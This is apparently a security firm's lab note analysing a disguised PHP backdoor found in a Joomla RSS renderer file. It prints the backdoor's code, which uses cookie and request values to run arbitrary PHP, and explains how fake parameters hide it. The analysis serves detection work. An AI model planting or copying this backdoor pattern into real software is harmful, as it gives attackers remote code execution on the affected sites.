Fake Parameters Conceal a Backdoor

Labs Note

We found this backdoor in the middle of the logrss.php file that defined the JDocumentRendererRSS class.

...function jregisterClass() { // merge arrays $info = array_merge($_REQUEST,$_COOKIE);   // validate parameters  if ( !isset($info['mlg']) ) die( 'Restricted access' );   else $info['feed']($info['file'], $info['link'].'"'.  $info['mlg'].'"'.$info['title'], $info['file'][1]);}/*  Pass the feed data   @access public  @return string /jregisterClass( 'onAfterStart', 'JDocumentRendererRSS' );function JDocumentRendererRSSdata($data){...

The code looks very natural until you check what it does.

jregisterClass( 'onAfterStart', 'JDocumentRendererRSS' );

This code looks like it registers the legitimate JDocumentRendererRSS class to be used after starting the application/plugin, right?

There is really a onAfterStart trigger for Joomla mambots but it is used in a different context–and what’s more important–there is no standard jregisterClass function. However, that very file defines its own jregisterClass function (you can see this in the first snippet).

That function doesn’t define any parameters though. It turns out, in PHP you can pass as many fake parameters as you want and the function will only use the ones that it expects. So the ‘onAfterStart‘, ‘JDocumentRendererRSS‘ parameters are just a red herring.

The function itself is a classic backdoor. Its code uses cookies and values of the POST, GET parameters to execute arbitrary PHP code.

This type of backdoor is very easy to miss when you manually inspect the files. That’s why integrity control monitoring is very important. It helps you identify modified files and in best cases, shows exactly what has been changed.

If you’re having difficulty identifying malicious code on your website, our team can help.

You May Also Like